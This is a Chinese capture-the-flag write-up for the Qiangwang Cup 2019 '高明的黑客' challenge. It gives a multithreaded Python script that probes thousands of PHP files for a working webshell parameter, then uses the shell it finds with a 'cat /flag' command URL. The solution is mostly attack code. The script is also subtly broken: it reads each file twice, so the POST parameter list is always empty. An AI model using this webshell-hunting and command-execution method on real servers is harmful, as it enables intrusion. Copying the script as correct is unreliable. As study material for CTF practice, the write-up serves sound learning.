[强网杯 2019]高明的黑客(考察代码编写能力)

0x01 试题分析

1、我们先打开题目,提示可以下载源码
在这里插入图片描述下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell
[强网杯 2019]高明的黑客(考察代码编写能力)_第1张图片
[强网杯 2019]高明的黑客(考察代码编写能力)_第2张图片
不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。

0x02 脚本分析

– coding: utf-8 –

import os
import requests
import re
import threading
import time
print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100)  							  			#这儿设置最大的线程数
filePath = r"D:/soft/phpstudy/PHPTutorial/WWW/src/"
os.chdir(filePath)													#改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5								#设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False											 # 设置连接活跃状态为False
def get_content(file):
    s1.acquire()												
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:							#打开php文件,提取所有的$_GET和$_POST的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}														#所有的$_POST
    params = {}														#所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://127.0.0.1/src/'+file
    req = session.post(url, data=data, params=params)			#一次性请求所有的GET和POST
    req.close()												# 关闭请求  释放内存
    req.encoding = 'utf-8'
    content = req.text
    #print(content)
    if "xxxxxx" in content:									#如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()												# 关闭请求  释放内存
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()												# 关闭请求  释放内存
                if "xxxxxx" in content:
                    break
        if flag == 1:													#flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:															#加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

0x03 结果分析

[强网杯 2019]高明的黑客(考察代码编写能力)_第3张图片
[强网杯 2019]高明的黑客(考察代码编写能力)_第4张图片
这个脚本大概四分钟便可以找到参数的利用点。以前写的脚本跑了一两个小时都没有跑出来,主要是因为这个脚本很巧妙的将所有参数一起传入进去,如果发现可以利用再细分找具体的参数。
而以前是遍历所有的GETPOST参数去试,速度真的很慢!!!
说到底还是自己太菜了!!!
req = session.post(url, data=data, params=params) #一次性请求所有的GET和POST

我们访问
http://12a60ca6-f3f8-42bd-b23f-c2403a362f9e.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag

得到flag
[强网杯 2019]高明的黑客(考察代码编写能力)_第5张图片

你可能感兴趣的:(BUUCTF刷题记录)